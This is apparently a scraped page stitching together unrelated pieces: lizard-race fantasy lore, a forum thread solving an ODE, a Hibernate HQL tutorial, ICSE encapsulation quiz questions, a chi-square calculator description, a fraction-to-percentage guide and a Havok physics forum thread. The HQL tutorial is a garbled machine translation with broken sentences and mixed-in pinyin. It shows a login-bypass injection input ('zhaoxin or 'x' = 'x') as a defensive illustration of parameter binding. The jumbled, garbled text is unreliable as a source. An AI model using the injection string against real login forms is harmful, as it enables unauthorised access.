Jin'tulu resemble anthropomorphic lizards. The average Jin'tulu weighs 140 lbs and usually measures up to 6 feet tall. Humans and Jin'tulu do not differ too greatly, despite one being mammal and the other reptile. The Jin'tulu are reptilian and covered in scales, mostly teal or green, though those who spend time in the sun eventually gain black scales. Their eyes are similar to those of the Madagascar velvet gecko: narrow black pupils surrounded by red and orange. Males have a larger snout than females. Females are known for slick black hair, thin tails, short snouts, and smaller teeth; males for horns along their backs, sharper fingernails, and a lack of any body hair. Both sexes have a digitigrade stance, and males typically have much broader shoulders and a larger body frame overall.

Personality

Jin'tulu are known to be aggressive in battle: they get straight to the point, and few show emotion. They use special combat tactics such as "Ground Fighting", a technique that usually consists of burrowing underground, waiting for enemies to come near, and jabbing them with sharp spears. Poison that induces writhing pain is their signature weapon, and they usually coat their weapons with it. Jin'tulu also seek to establish good relationships with other races, as they believe good relationships result in a better society.
Leadership & Government

(Image: Chieftain Rhanakhed, the current chieftain of the Jin'tulu)

The current leader is Chieftain Rhanakhed. He is quite old but skilled in fighting, known to be aggressive in combat, and will do anything to keep his people safe and secure. He does not normally get along with the leaders of other races (except the Human leader, King Earnet), but tries to tolerate anyone he is allied with. He gets along with King Earnet quite well, as the two share similar ideals and combat techniques.

The Jin'tulu have a clan-like government, with a chieftain in charge of the race. The chieftain is responsible for all of the race's decisions and for keeping the people happy, alive, and healthy. Every few years a ceremonial arena battle decides the next chieftain: the current chieftain fights any Jin'tulu who desire the title, and these battles usually end with one opponent dead.

Culture

The Jin'tulu are very tribal and love fine art and crafting. They create traditional music from chants, hums, and tribal instruments, and proudly display their paintings and other artwork everywhere. They also have a reputation for using chemicals and mixtures to create a signature poison, which induces heavy irritation and writhing pain and can be fatal if it enters the bloodstream. Jin'tulu often craft weapons from sticks, rocks, and twine; these are usually sharpened and commonly spear-like, and they trade for higher-quality weapons when preparing for an oncoming battle. Their armor ranges from copper and tin to highly durable metals of their own making, the latter usually reserved for the Chieftain and his guard.
Verify unsolvable ODE on Midterm

Nov 7, 2008 #1 (OP): Long story short, our professor was replaced by a substitute on the day of the midterm. After 3/4 of the allowed time had passed, the substitute announced that the first question might contain a typo. He didn't suggest how to fix the problem or anything; he just claimed there might be a problem with the first question. Can someone take a look at it? This is for Ordinary Differential Equations I. Here is the first question:

Solve the initial value problem:
y''' + y'' + 4y' + 4 = 0
y(0) = 5; y'(0) = 7; y''(0) = -5

Thank you very much.

Nov 7, 2008 #2, gabbagabbahey (Homework Helper): I don't think there is any typo; it seems easily solvable to me. Just use the method of undetermined coefficients: you have a fairly simple 3rd-order inhomogeneous ODE.

Nov 7, 2008 #3 (OP): y''' + y'' + 4y' + 4 = 0 would become y''' + y'' + 4y' = -4, so m^3 + m^2 + 4m = 0, i.e. m(m^2 + m + 4) = 0, giving m1 = 0 and m2 = a complex root. Is that right?

Nov 7, 2008 #4, gabbagabbahey: That looks like a good start for your complementary solution. What form does that portion of your solution take?

Nov 7, 2008 #5 (OP): Hmm... e^a(c1 cos(bx) + c2 sin(bx))

Nov 7, 2008 #6, gabbagabbahey: That's part of it. What are the values of 'a' and 'b', and what happened to your m1 = 0 root?

Nov 7, 2008 #7 (OP): a would be -1/2 and b would be sqrt(15)/2. We have never seen the case where m1 and m2 are real and complex. Where would I go from here?

Nov 7, 2008 #8, gabbagabbahey: A real root m1 just adds a c3*e^(m1 x) term; in this case m1 = 0 and e^0 = 1, so it adds a constant term and your complementary solution is:

[tex]y_c(x)=e^{\frac{-x}{2}} \left( c_1 \cos \left( \frac{\sqrt{15}}{2} x \right)+c_2 \sin \left(\frac{\sqrt{15}}{2} x \right) \right) +c_3[/tex]

Do you follow?

Nov 7, 2008 #9 (OP): Yes, I follow... Where would I go from here?

Nov 7, 2008 #10, gabbagabbahey: Now you need to find a particular solution. Your inhomogeneous term is just '-4'. Suppose you had only a second-order ODE; what would you guess as a particular solution there? Can you guess the form of a particular solution for the 3rd-order ODE?

Nov 7, 2008 #11 (OP): OK, I get it from this point on. However, we've never really had any practice with m1 = 0 and m2 complex. I wonder why the prof said it was a typo now.. lol..

Nov 7, 2008 #12, gabbagabbahey: Maybe because he thought that the sqrt(15)/2 was a little too ugly for an exam question, but who knows :shrug:

Nov 7, 2008 #13 (OP): We weren't allowed calculators.. I don't think that changes much though.

Nov 7, 2008 #14, gabbagabbahey: My guess is your replacement prof didn't have his morning coffee, made an error in his attempt to solve the problem, couldn't find it, and so concluded something might be wrong with the question. But that's just speculation on my part :smile:

Nov 7, 2008 #15, HallsofIvy (Staff Emeritus, Science Advisor): He probably looked at y''' + y'' + 4y' + 4 = 0 and thought perhaps it should be y''' + y'' + 4y' + 4y = 0, which would be more "standard form" but distinctly harder than the original problem!
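For completeness, the thread's hints can be carried through to the full solution. The working below is my own (it does not appear in the thread) and builds on the complementary solution from post #8, so it should be checked before relying on it:

```latex
% Homogeneous part: m(m^2 + m + 4) = 0 \;\Rightarrow\; m_1 = 0,\; m = -\tfrac12 \pm i\,\tfrac{\sqrt{15}}{2}
% Particular solution: try y_p = a x \;\Rightarrow\; 4a + 4 = 0 \;\Rightarrow\; y_p = -x
y(x) = c_3 - x + e^{-x/2}\left( c_1\cos\tfrac{\sqrt{15}}{2}x + c_2\sin\tfrac{\sqrt{15}}{2}x \right)
% Initial conditions:
% y(0)=5:\quad   c_1 + c_3 = 5
% y'(0)=7:\quad  -\tfrac{c_1}{2} + \tfrac{\sqrt{15}}{2}\,c_2 - 1 = 7
% y''(0)=-5:\quad -\tfrac{7c_1}{2} - \tfrac{\sqrt{15}}{2}\,c_2 = -5
% Solving:\quad c_1 = -\tfrac34,\qquad c_2 = \tfrac{61}{4\sqrt{15}},\qquad c_3 = \tfrac{23}{4}
```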
HQL statement examples and detailed explanations (reprinted)

HQL queries: Criteria queries wrap querying in an object-oriented way that matches how programmers think, but HQL (Hibernate Query Language) offers richer and more flexible query features. Hibernate establishes HQL as its officially recommended standard query method: on the premise of covering all the features of Criteria queries, it provides queries similar to standard SQL statements while adding a more object-oriented wrapping. The general form of an HQL statement is:

select / update / delete ... ... from ... ... where ... ... group by ... ... having ... ... order by ... ... asc / desc

Here update / delete are features newly added in Hibernate3. As you can see, HQL is very similar to standard SQL. Since HQL queries sit at the core of Hibernate's entity operations, this section explains the specific technical details of HQL.

1. Entity queries

We have already touched on entity queries, as in the following example:

String hql = "from User user";
List list = session.createQuery(hql).list();

The code above queries all data corresponding to the User entity, encapsulates the data into User entity objects, and returns them in a List. Note that Hibernate entity queries take inheritance into account. As discussed earlier for the Employee entity mapped with an inheritance relation, which has the two subclasses HourlyEmployee and SalariedEmployee, the HQL statement "from Employee" retrieves data for all objects of the Employee entity type, including the data corresponding to its subclasses HourlyEmployee and SalariedEmployee.
Since HQL statements resemble standard SQL, we can use a where clause in HQL, and within it a variety of expressions and comparison operators, combining different query conditions with "and" and "or". Some simple examples:

from User user where user.age = 20;
from User user where user.age between 20 and 30;
from User user where user.age in (20, 30);
from User user where user.name is null;
from User user where user.name like '%zx%';
from User user where (user.age % 2) = 1;
from User user where user.age = 20 and user.name like '%zx%';

2. Updating and deleting entities

Before moving on to the more powerful query features of HQL, let us first look at updating and deleting entities with HQL. This capability is new in Hibernate3 and was not available in Hibernate2. For example, in Hibernate2, if we wanted to change the age of all users aged 18 to 20, we first had to retrieve the users aged 18, then modify their age to 20, and finally call Session.update() to save the changes. For this problem Hibernate3 provides a more flexible and more efficient solution:

Transaction trans = session.beginTransaction();
String hql = "update User user set user.age = 20 where user.age = 18";
Query queryUpdate = session.createQuery(hql);
int ret = queryUpdate.executeUpdate();
trans.commit();

In this way Hibernate3 lets us complete the update as a single bulk operation, and the performance improvement is quite substantial.
Deletion can be done in a similar manner:

Transaction trans = session.beginTransaction();
String hql = "delete from User user where user.age = 18";
Query queryDelete = session.createQuery(hql);
int ret = queryDelete.executeUpdate();
trans.commit();

If you have been reading the chapters in order, you will remember the discussion of this mode of operation in the earlier part on bulk data manipulation; in Hibernate3 it is referred to as bulk delete/update. This approach can significantly improve flexibility and efficiency, but it can also cause cache-synchronization problems (see the earlier discussion).

3. Attribute (projection) queries

Very often we do not need all the data of an entity object, only the data corresponding to some of its properties. In that case we can use HQL attribute queries, as in the following example:

List list = session.createQuery("select user.name from User user").list();
for (int i = 0; i < list.size(); i++) {
    System.out.println(list.get(i));
}

Here we retrieve only the data for the User entity's name property; each entry in the returned List is a String holding a name value. We can also retrieve several properties at once:

List list = session.createQuery("select user.name, user.age from User user").list();
for (int i = 0; i < list.size(); i++) {
    Object[] obj = (Object[]) list.get(i);
    System.out.println(obj[0]);
    System.out.println(obj[1]);
}

In this case each entry of the returned List is an Object[] containing the corresponding property values.
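The Object[] unpacking pattern above can be exercised without Hibernate or a database. The sketch below fakes a multi-column projection result with plain collections; the ProjectionDemo class and its sample data are hypothetical illustrations, not part of the article's code:

```java
import java.util.ArrayList;
import java.util.List;

// Hibernate returns multi-column projections as a List of Object[] rows.
// Here we simulate such a result set to show the cast-and-unpack pattern.
public class ProjectionDemo {

    // Unpacks each row into a readable "name (age)" string.
    static List<String> describeRows(List<Object[]> rows) {
        List<String> out = new ArrayList<>();
        for (Object[] row : rows) {
            String name = (String) row[0];   // column 0: user.name
            Integer age = (Integer) row[1];  // column 1: user.age
            out.add(name + " (" + age + ")");
        }
        return out;
    }

    public static void main(String[] args) {
        // A fake projection result, as "select user.name, user.age" would return it.
        List<Object[]> fakeResult = new ArrayList<>();
        fakeResult.add(new Object[] { "zhaoxin", 20 });
        fakeResult.add(new Object[] { "pansl", 80 });

        for (String s : describeRows(fakeResult)) {
            System.out.println(s);
        }
    }
}
```

The same cast `(Object[]) list.get(i)` is what the article's loop performs on a real Hibernate result list.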
Developers today, shaped by object-oriented thinking, may find returning flat Object[] arrays unsatisfying. HQL's dynamic instantiation feature can wrap this flat data in objects:

List list = session.createQuery("select new User(user.name, user.age) from User user").list();
for (int i = 0; i < list.size(); i++) {
    User user = (User) list.get(i);
    System.out.println(user.getName());
    System.out.println(user.getAge());
}

By constructing instances dynamically we wrap the returned results so that our program better matches an object-oriented style. But note one problem: the User objects returned this way are merely ordinary Java objects. Apart from the queried values, all other properties are null, including the primary key id, so such objects cannot be used for persistent update operations through the Session:

List list = session.createQuery("select new User(user.name, user.age) from User user").list();
for (int i = 0; i < list.size(); i++) {
    User user = (User) list.get(i);
    user.setName("gam");
    session.saveOrUpdate(user); // this actually performs a save, not an update: the User
                                // object's id is null, so Hibernate treats it as a transient
                                // (free) object (see the section on persistent object states)
                                // and therefore saves it
}

4. Grouping and sorting

A. The order by clause

As in SQL, HQL queries can sort the result set with an order by clause, with the direction given by the asc or desc keyword:

from User user order by user.name asc, user.age desc;

The HQL query above sorts the name attribute in ascending order and the age attribute in descending order. As in SQL, the default sort direction is asc, i.e. ascending.

B. The group by clause and statistical queries

HQL supports grouping with the group by clause, as well as statistical queries combining group by with aggregate functions. Most standard SQL aggregate functions can be used in HQL, e.g. count(), sum(), max(), min(), avg(). For example:

String hql = "select count(user), user.age from User user group by user.age having count(user) > 10";
List list = session.createQuery(hql).list();

C. Optimizing statistical queries

Suppose we have two database tables, customer and order, structured as follows:

customer: ID varchar2(14), age number(10), name varchar2(20)
order: ID varchar2(14), order_number number(10), customer_ID varchar2(14)

Consider these two HQL queries:

from Customer c inner join c.orders o group by c.age; (1)
select c.ID, c.name, c.age, o.ID, o.order_number, o.customer_ID from Customer c inner join c.orders o group by c.age; (2)

Both statements use HQL join queries (covered in detail in the section on join queries). The two queries return the same result sets, but they
synchronization with back-end database, and only after the submission of their affairs will be removed from the cache; the statement (2) returns the relational data rather than persistent objects, so they will not take up Hibernate's Session cache, as long as the search after the application is not access them, they are occupied by JVM's memory is likely to be garbage collected, and the Hibernate does not synchronize their changes. In our system development, especially Mis system is inevitable to the development of statistical inquiry, such function has two features: the first volume of data; the second operation under normal circumstances are read-only and will not involve to the right system Meter data changes, then if a query using the first approach will inevitably lead to a large number of persistent objects in Hibernate's Session cache, and Hibernate's Session cache and data but also for their Database data synchronization. If the second query by way of, obviously it will improve query performance, because no Hibernate, Session cache management overhead, and long as the application Chengxubuzai use these Shuju, it Were occupied by the release of memory space will be recovered. Therefore, development of statistical query system, try to use the written statement required by select query to return the way the properties of relational data, and ways to avoid using the first query to return persistent objects (in this way is in a More suitable for use when demand changes), so you can improve operational efficiency and reduce memory consumption. Body of the real master is not fluent in all, but proficient in the right places with the appropriate means. 5, parameter binding: Hibernate dynamic query parameter binding on providing a wealth of support, then what is the query parameters dynamically bind it? 
In fact, if we are familiar with the traditional JDBC programming, we not difficult to understand the query parameters dynamic binding, The following code in the traditional JDBC bind parameters: PrepareStatement pre = connection.prepare ("select * from User where user.name =?"); pre.setString (1, "zhaoxin"); ResultSet rs = pre.executeQuery (); Also provided in the Hibernate query parameters like this binding function, but also on the Hibernate features than the traditional JDBC Operation provides rich multi-features, the existence of four kinds of parameters Hibernate bind the CPC In the manner, we will introduce the following: A, binding by parameter name: Defined in the HQL statement named parameters use ":" at the beginning of the form as follows: Query query = session.createQuery ("from User user where user.name =: customername and user.customerage =: age"); query.setString ("customername", name); query.setInteger ("customerage", age); The code above: customername and: customerage customername named parameters are defined and customerage, then use the Query interface setXXX () method to set name of the parameter values, setXXX () Method package With two parameters, namely, the name of named parameters and named parameters of the actual value. B, position by bonding parameters: Used in the HQL query "?" To define the parameters of location, format is as follows: Query query = session.createQuery ("from User user where user.name =? And user.age =?"); query.setString (0, name); query.setInteger (1, age); Use the same setXXX () method to set bind parameters, but this time setXXX () method of the first argument on behalf of bonding parameters appear in the HQL statement, the position number (from 0 starting number), the second argument still behalf of the Senate Actual value. 
Note: In the actual development, the state will promote the use of named parameters by name, because it not only provides a very good program readability, but also to improve the program's ease of maintenance, because when the query parameters of the position is changed , By name naming parameters in the way state does not require adjustment of program code. C, setParameter () method: In Hibernate's HQL query by setParameter () method of bonding parameters of any type, the following code: String hql = "from User user where user.name =: customername"; Query query = session.createQuery (hql); query.setParameter ("customername", name, Hibernate.STRING); Code as shown above, setParameter () method contains three parameters, namely the name of named parameters, named parameters of the actual value, and name the parameter mapping type. For some parameter type setParameter () method More parameter values to Java types, guess the corresponding mapping type, so this time do not need to write a map type display, such as the above example, can write: query.setParameter ("customername", name); but for some types of maps must indicate the type, such as java.util.Date type, because it corresponds to a variety of Hibernate mapping types, such as Hibernate.DATA or Hibernate.TIMESTAMP. D, setProperties () method: In Hibernate you can use the setProperties () method, named parameters with an object tied to property values, as follows code: Customer customer = new Customer (); customer.setName ("pansl"); customer.setAge (80); Query query = session.createQuery ("from Customer c where c.name =: name and c.age =: age"); query.setProperties (customer); setProperties () method will automatically be customer object instance property value to the named parameters match, but the requested named parameter name must be the appropriate entity object attributes with the same name. 
There is also a special setEntity () method, which will name the parameters associated with a persistent object, as shown in the following code: Customer customer = (Customer) session.load (Customer.class, "1"); Query query = session.createQuery ("from Order order where order.customer =: customer"); query. setProperties ("customer", customer); List list = query.list (); The above code will be generated similar to the following SQL statement: Select * from order where customer_ID = '1 '; E, the advantages of using the binding parameters: Why do we use the binding named parameters? The existence of any one thing all have their value, specific to the binding parameters for the HQL query, the main there are two main advantages: ① , can be implemented using database performance optimization, because Hibernate is using a PrepareStatement at the bottom to complete the query, so the same parameters for different SQL syntax statements, can be To take advantage of pre-compiled SQL statement cache, so as to enhance query efficiency. ② , can prevent SQL Injection vulnerabilities arise: SQL Injection is a specially assembled for the attack SQL statement, such as our common user login, the login screen, users enter a user name and password, then login verification process may be generated as Under the HQL statement: "From User user where user.name = '" + name + "' and user.password = '" + password + "'" The HQL statement is logically no problems, this login authentication in general is done correctly, but if the user name when logging in, type "zhaoxin or 'x' = 'x", Then using a simple HQL statement if the string assembly, it will generate the following HQL statement: "From User user where user.name = 'zhaoxin' or 'x' = 'x' and user.password = 'admin'"; Obviously this HQL statement of where the words will always be true, Er Shi meaningless role of the user password, which is the basic principle of SQL Injection attacks. 
By using bound parameters we can deal with this problem correctly. With parameter binding, the HQL statement becomes:

from User user where user.name = 'zhaoxin'' or ''x'' = ''x' and user.password = 'admin'

As can be seen, with bound parameters the user name that was entered is parsed as a single string, single quotes included (to include a single quote inside a string, it is written as a doubled single quote), so parameter binding prevents SQL injection vulnerabilities.
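The same contrast — string assembly versus bound parameters — can be sketched outside Hibernate as well. The snippet below uses Python's standard sqlite3 module purely for illustration (the table and values are made up, not from the article):

```python
import sqlite3

# In-memory database with one user, mirroring the login example above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('zhaoxin', 'secret')")

malicious_name = "zhaoxin' or 'x' = 'x"

# Unsafe: string assembly lets the quote in the input rewrite the query,
# so the row is returned even though the password is wrong.
unsafe = ("SELECT * FROM users WHERE name = '" + malicious_name +
          "' AND password = 'admin'")
print(len(conn.execute(unsafe).fetchall()))   # 1 row: login bypassed

# Safe: bound parameters treat the whole input as one string value.
safe = "SELECT * FROM users WHERE name = ? AND password = ?"
print(len(conn.execute(safe, (malicious_name, "admin")).fetchall()))  # 0 rows
```

The bound version never interprets the attacker's quotes as SQL syntax, which is exactly the property the article describes for Hibernate's PreparedStatement-based binding.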
Encapsulation
Class 10 Computer Applications Chapter 6 Encapsulation Important Questions
Provided here are Class 10 Encapsulation important questions and answers. Crafted meticulously, these questions aim to strengthen students' grasp of fundamental concepts from earlier classes. Embracing various question formats, these exercises focus on consolidating core principles, addressing uncertainties, and refining problem-solving skills. By engaging with these questions, students can fortify their exam preparation, boost confidence, and polish the essential proficiencies vital for excelling in the ICSE Class 10 Computer Applications Examination.
Introduction
The Encapsulation chapter of Class 10 Computer Applications delves into Encapsulation, a fundamental aspect of object-oriented programming. Encapsulation involves bundling data (attributes) and the methods (functions) that manipulate the data into a single unit, known as a class. This ensures that the internal workings of an object are hidden from the outside world, allowing controlled access to data, promoting security, and facilitating efficient code management. Solving ICSE Class 10 Computer important questions will help students understand the concepts better.
What is Encapsulation?
Encapsulation is a fundamental principle in object-oriented programming (OOP) where the data (variables) and the methods (functions) that operate on the data are bound together within a single unit known as a class. Solving Encapsulation important questions for Class 10 ICSE is essential for a comprehensive understanding and successful examination preparation. Explore oswal.io for ICSE Class 10 important questions (2023-24) to strengthen your knowledge in these fundamental areas of computer applications.
Class 10 Encapsulation Important Questions and Answers
Q1.
What is the proper access specifier for data members of a class?
Options (a) Private (b) Default (c) Protected (d) Public
Ans. (a) Private
Explanation: All data members should be made private to ensure the highest security of data. In special cases public or protected access can be used, but it is advisable to always keep data members private.
Q2. ___________ keyword is used while creating a static method.
Options (a) Static (b) Final (c) Instance (d) Nostat
Ans. (a) Static
Explanation: A static method definition must start with the static keyword.
Q3. What is meant by private visibility of a method?
Explanation: Private methods can be used only in the class in which they are defined. They cannot be accessed outside that class.
Q4. Differentiate between private and protected visibility modifiers.
Explanation: Private is the most restrictive access specifier; private members are accessible only within their own class. Protected members are accessible by the classes of the same package, or by a child class in any other package.
Q5. In the program given below, state the name and the value of the:
(i) method argument or argument variable.
(ii) class variable.
(iii) local variable.
(iv) instance variable.
class myClass
{
    static int x = 7;
    int y = 2;

    public static void main(String args[])
    {
        myClass obj = new myClass();
        System.out.println(x);
        obj.sampleMethod(5);
        int a = 6;
        System.out.println(a);
    }

    void sampleMethod(int n)
    {
        System.out.println(n);
        System.out.println(y);
    }
}
Explanation:
(i) int n; (argument variable)
(ii) x = 7; (class variable)
(iii) a = 6; (local variable)
(iv) y = 2; (instance variable)
ICSE Class 10 Computer Applications Chapter-wise Important Questions
Chapter 1 – Revision of Class IX Syllabus
Chapter 2 – Class as a Basis of all Computation
Chapter 3 – User-defined Methods
Chapter 4 – Constructors
Chapter 5 – Library Classes
Chapter 6 – Encapsulation
Chapter 7 – Arrays
Chapter 8 – String Handling
Conclusion
The exploration of Encapsulation in Chapter 6 of Class 10 Computer Applications provides a crucial understanding of object-oriented programming. By encapsulating data and methods within a class, students acquire a robust foundation in securing data integrity, enhancing code organization, and fostering modular programming. If you are looking to further practice and enhance your understanding of the concepts discussed in the chapter, oswal.io provides a comprehensive set of Class 10 Encapsulation important questions and answers for understanding the concepts in a better way.
Frequently Asked Questions
Q1: What is Encapsulation in Object-Oriented Programming?
Ans: Encapsulation is the mechanism of bundling data (attributes) and methods (functions) that manipulate the data into a single unit (class).
Q2: How does Encapsulation Achieve Data Security?
Ans: Encapsulation restricts access to certain components within a class, enabling data hiding and protecting it from unwanted access or modification.
Q3: Why is Encapsulation Important in Software Development?
Ans: Encapsulation promotes code organization, modularity, and better maintainability by hiding the internal workings of an object and exposing only necessary functionalities.
Q4: How Does Encapsulation Differ from Abstraction?
Ans: Encapsulation focuses on bundling data and methods together, while abstraction emphasizes showing only the essential features of an object and hiding its complexity.
Q5: Can Encapsulation Enhance Security in Software Systems?
Ans: Yes, encapsulation can improve security by preventing unauthorized access to sensitive data and ensuring that data can only be manipulated through controlled methods.
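The ICSE syllabus illustrates these ideas in Java, but the same principle can be sketched in Python as well (the Account class below is a made-up example, not from the syllabus):

```python
class Account:
    """Encapsulation: data is kept private and reached only through methods."""

    def __init__(self, balance):
        self.__balance = balance          # name-mangled "private" attribute

    def get_balance(self):                # controlled read access
        return self.__balance

    def deposit(self, amount):            # controlled, validated write access
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self.__balance += amount


acc = Account(100)
acc.deposit(50)
print(acc.get_balance())                  # 150
# Direct access to the hidden attribute fails:
# acc.__balance  ->  AttributeError
```

The data can only be changed through deposit(), which validates its input — the "controlled access" that the answers above describe.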
Chi-Square Test for One Population Variance
Instructions: This calculator conducts a Chi-Square test for one population variance (\(\sigma^2\)). Please select the null and alternative hypotheses, type the hypothesized variance, the significance level, the sample variance, and the sample size, and the results of the Chi-Square test will be presented for you.
Inputs: null hypothesis Ho: \(\sigma^2 = \sigma_0^2\); alternative hypothesis Ha (two-tailed, left-tailed, or right-tailed); hypothesized variance (\(\sigma_0^2\)); sample variance (\(s^2\)); sample size (n); significance level (\(\alpha\)).
More about the Chi-Square test for one variance, so you can better understand the results provided by this solver: a Chi-Square test for one population variance is a hypothesis test that attempts to make a claim about the population variance (\(\sigma^2\)) based on sample information. The test, like every other well-formed hypothesis test, has two non-overlapping hypotheses, the null and the alternative hypothesis. The null hypothesis is a statement about the population variance which represents the assumption of no effect, and the alternative hypothesis is the complementary hypothesis to the null hypothesis.
The main properties of a one-sample Chi-Square test for one population variance are:
• The distribution of the test statistic is the Chi-Square distribution, with n-1 degrees of freedom
• The Chi-Square distribution is one of the most important distributions in statistics, together with the normal distribution and the F-distribution
• Depending on our knowledge about the "no effect" situation, the Chi-Square test can be two-tailed, left-tailed or right-tailed
• The main principle of hypothesis testing is that the null hypothesis is rejected if the test statistic obtained is sufficiently unlikely under the assumption that the null hypothesis is true
• The p-value is the probability of obtaining sample results as extreme or more extreme than the sample results obtained, under the assumption that the null hypothesis is true
• In a hypothesis test there are two types of errors: a Type I error occurs when we reject a true null hypothesis, and a Type II error occurs when we fail to reject a false null hypothesis
The formula for the Chi-Square statistic is \[\chi^2 = \frac{(n-1)s^2}{\sigma_0^2}\] The null hypothesis is rejected when the Chi-Square statistic lies in the rejection region, which is determined by the significance level (\(\alpha\)) and the type of tail (two-tailed, left-tailed or right-tailed). To compute critical values directly, please go to our Chi-Square critical values calculator.
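The statistic defined above is simple enough to compute by hand; here is a plain-Python sketch (the sample numbers below are made up for illustration):

```python
def chi_square_statistic(n, sample_var, hyp_var):
    """Chi-square statistic for one population variance: (n-1) * s^2 / sigma0^2."""
    return (n - 1) * sample_var / hyp_var

# Example: sample size n = 25, sample variance s^2 = 12,
# hypothesized variance sigma0^2 = 10.
stat = chi_square_statistic(25, 12, 10)
print(stat)   # 28.8 -- compare against a chi-square table with df = 24
```

The resulting value would then be compared with the critical value for n-1 = 24 degrees of freedom at the chosen significance level to decide whether to reject the null hypothesis.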
What is 19/55 as a percentage?
It's very common when learning about fractions to want to know how to convert a fraction like 19/55 into a percentage. In this step-by-step guide, we'll show you how to turn any fraction into a percentage really easily. Let's take a look!
Before we get started in the fraction to percentage conversion, let's go over some very quick fraction basics. Remember that a numerator is the number above the fraction line, and the denominator is the number below the fraction line. We'll use this later in the tutorial.
When we are using percentages, what we are really saying is that the percentage is a fraction of 100. "Percent" means per hundred, and so 50% is the same as saying 50/100 or 5/10 in fraction form.
So, since our denominator in 19/55 is 55, we could adjust the fraction to make the denominator 100. To do that, we divide 100 by the denominator:
100 ÷ 55 = 1.8181818181818
Once we have that, we can multiply both the numerator and denominator by this multiple:
19 x 1.8181818181818 / 55 x 1.8181818181818 = 34.545454545455 / 100
Now we can see that our fraction is 34.545454545455/100, which means that 19/55 as a percentage is 34.5455%.
We can also work this out in a simpler way by first converting the fraction 19/55 to a decimal. To do that, we simply divide the numerator by the denominator:
19/55 = 0.34545454545455
Once we have the answer to that division, we can multiply the answer by 100 to make it a percentage:
0.34545454545455 x 100 = 34.5455%
And there you have it! Two different ways to convert 19/55 to a percentage. Both are pretty straightforward and easy to do, but I personally prefer the convert-to-decimal method as it takes fewer steps.
I've seen a lot of students get confused whenever a question comes up about converting a fraction to a percentage, but if you follow the steps laid out here it should be simple.
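The convert-to-decimal method described above is easy to wrap in a small Python helper (a sketch; the function name is ours, not from the tutorial):

```python
def fraction_to_percentage(numerator, denominator, places=4):
    # Method 2 from the text: convert to a decimal, then multiply by 100.
    return round(numerator / denominator * 100, places)

print(fraction_to_percentage(19, 55))   # 34.5455
print(fraction_to_percentage(1, 2))     # 50.0
```

Rounding to four decimal places reproduces the 34.5455% result worked out step by step above.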
That said, you may still need a calculator for more complicated fractions. If you want to practice, grab yourself a pen, a pad, and a calculator and try to convert a few fractions to a percentage yourself.
Hopefully this tutorial has helped you to understand how to convert a fraction to a percentage. You can now go forth and convert fractions to percentages as much as your little heart desires!
hkpPhysicsSystem.clone() crash!

kevin_lee:
Hi, I encountered a strange error when trying to import a .hkx file into the engine. In my engine, I want to generate a .hkx file for each actor; when loading the actor, I load the corresponding physics data. So every time I initialize the actor's physics data, I try to clone the physics system in the .hkx file. But when the constraints are constrained to the world, the error pops up: "Rigidbodies are referenced by a constraint in the physics system that are not in the physics system." How can I fix this error? Or is there any better way to import the physics data into my own actors? Please, anybody, help me out!

havokdaniel:
Hi Kevin, It is not possible to clone constraints which are constrained to the world right now. This is a known issue and a fix is in progress. I do not know when it will be complete though. For the meantime you can try using hkpConstraintInstance::setFixedRigidBodyPointersToZero() on everything in hkpPhysicsSystem::getConstraints() to make sure there are no invalid references. Let me know if you have any trouble getting this going. Thanks, Daniel

kevin_lee:
Thank you very much, Daniel! I'll try the functions you mentioned. Hope you guys will fix this soon. It's annoying without this support.

kevin_lee:
Hi Daniel, I used the functions you mentioned before. It didn't work — I still get the error message! Maybe I should tell you more about our situation, then you can give me some suggestions. We want to use the Havok Content Tool to create some physics objects attached to our own actors. Each of our actors has its own data file, so we want to export these physics objects as a .hkx data file for each actor.
When we add the actor into the scene, if it's the first time adding this actor, we import the .hkx file and clone the physics system in the physics data. Each time we want to create an instance of this actor, we just clone the physics system and add it into the world. If the bug can't be fixed right now, what suggestions can you give us?

havokdaniel:
Hi Kevin, Can you try cloning the physics system and, before adding to the world, debug into hkpPhysicsSystem::getConstraints() and check that neither hkpConstraintInstance::m_entities[0] nor hkpConstraintInstance::m_entities[1] is hkpWorld::getFixedRigidBody()? Also, could you explain how you're adding the cloned physics system to the world? Thanks, Daniel

kevin_lee:
Hi Daniel, I checked all the constraints in the physics system. If one entity pointer is NULL, then when I clone the physics system I get the assert failure message: "Rigidbodies are referenced by a constraint in the physics system that are not in the physics system." If no constraints are constrained to the world, there are no such error messages, and I change the rigid bodies' positions according to my own actors and then add the physics system into the world. The problem occurs when cloning the physics system; adding it into the world is OK. After all these failures, I now use another way to solve this problem: when I find that some entity pointers are NULL, I reload the .hkx file, and instead of cloning, I just add it into the world. It's ugly, but it works. And I have another problem: how can I change a constraint's position? I mean, when the constraint is constrained to the world, I sometimes need to change the fixed point before adding it into the world. From the demos and the headers, I can't find any functions that can help me do this kind of job! I can change the position of the rigid bodies, but the constraints don't go with them. Can you give me any suggestions?
Thanks for your quick reply! Kevin

havokdaniel:
Hi Kevin, Glad you got a workaround to that problem. Unfortunately the only way to move a constraint like that is to get at the constraint data. This is different for every constraint type, so you'll have to check which type of constraint you're dealing with, then get the constraint data, cast it to the correct constraint data type, and modify that. What you're looking for is in Havok 6.0 (hkpPhysicsSystem::transform()) but we don't have the free SDK version released yet. I haven't had a chance to implement this code myself but I think you'll need to do something like

if (constraintInstance->getData()->getType() == hkpConstraintData::CONSTRAINT_TYPE_BALLANDSOCKET)
{
    hkpBallAndSocketConstraintData* ballSocketData = static_cast<hkpBallAndSocketConstraintData*>(data);
    // Grab the transforms of constraintInstance->getEntityA and constraintInstance->getEntityB,
    // transform them, and do ballSocketData->setInWorldSpace() with the new positions.
}
else if (constraintInstance->getData()->getType() == hkpConstraintData::CONSTRAINT_TYPE_HINGE)
{
    // Do the same for this type of constraint instance...
}

Hope this puts you on the right track, Daniel

kevin_lee:
Hi Daniel, It's great to hear that there's a function that can do this job. So when I get the Havok 6.0 license, the job will be very easy. I've implemented this in the same way you talked about. Thanks! I noticed that something weird happens to a capsule when you hit it — not so realistic. The ragdoll is OK, but the single capsule seems a little bit weird. Is that a bug or something?
__label__pos
0.679877
